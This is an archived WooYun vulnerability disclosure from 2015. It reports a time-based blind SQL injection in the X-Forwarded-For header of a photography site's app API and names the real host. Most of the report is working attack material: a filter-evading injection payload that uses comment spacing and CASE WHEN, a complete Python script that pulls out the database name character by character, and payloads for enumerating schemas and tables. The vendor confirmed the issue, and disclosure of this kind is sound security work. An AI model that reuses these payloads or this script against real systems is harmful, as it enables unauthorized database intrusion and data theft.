乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-12: 细节已通知厂商并且等待厂商处理中 2015-11-12: 厂商已经确认,细节仅向厂商公开 2015-11-22: 细节向核心白帽子及相关领域专家公开 2015-12-02: 细节向普通白帽子公开 2015-12-12: 细节向实习白帽子公开 2015-12-27: 细节向公众公开
请教SQLMAP之绕过if过滤的tamper~
目标:蜂鸟网官方APP(api.fengniao.com)检测发现以下地方存在SQL注入漏洞:(header中的X-Forwarded-For,延时盲注)
GET http://api.fengniao.com/app_ipad/news_list.php HTTP/1.1Accept-Encoding: gzip,deflateX-Forwarded-For: 1Connection: closeAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Host: api.fengniao.com
由于网站设置了过滤(空格、逗号/if等),所以SQLMap没跑出来……所以又只能写Python跑了,先手工得到Payload如下,空格使用/**/代替,IF使用CASE WHEN代替:
'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/1=1/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm
因此,只要替换1=1为查询语句即可,因此附上验证脚本:(以跑当前数据库名为例,测试时请修改脚本中代理)
#!/usr/bin/env python#coding=utf8import httplib, urllib, re, timedatabase = ''temp_database = ''httpClient = Nonecount = 0i = 33while i < 128: if i == 37: i = i+1 try: headers = {"Host": "api.fengniao.com", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0", "Accept-Encoding": "gzip,deflate", "X-Forwarded-For": "'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/(database()/**/like/**/0x"+temp_database+str(hex(i))[2:]+"25)/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm", "Accept": "*/*", "Connection": "close"} httpClient = httplib.HTTPConnection("192.168.222.202", 8080, timeout=30) url = 'http://api.fengniao.com/app_ipad/news_list.php' httpClient.request("GET", url=url, headers=headers) st = time.time() response = httpClient.getresponse() rp = response.read() if count == 1: if time.time()-st > 3: temp_database = temp_database + str(hex(i))[2:] database = database + chr(i) print 'user(): ', database i = 33 count = 0 else: count = 0 elif time.time()-st > 3: count = 1 i = i-1 i=i+1 except Exception, e: print e finally: if httpClient: httpClient.close()
1、跑出当前数据库用户
2、跑出当前数据库名
3、跑出所有数据库名,发现共67个,payload如下
'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/((select/**/count(*)/**/from/**/information_schema.SCHEMATA)=67)/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm
太多了,于是就跑前几个吧……
4、跑出当前库的表名,只跑前两个作为验证~
请多指教~
危害等级:中
漏洞Rank:10
确认时间:2015-11-12 18:46
非常感谢
暂无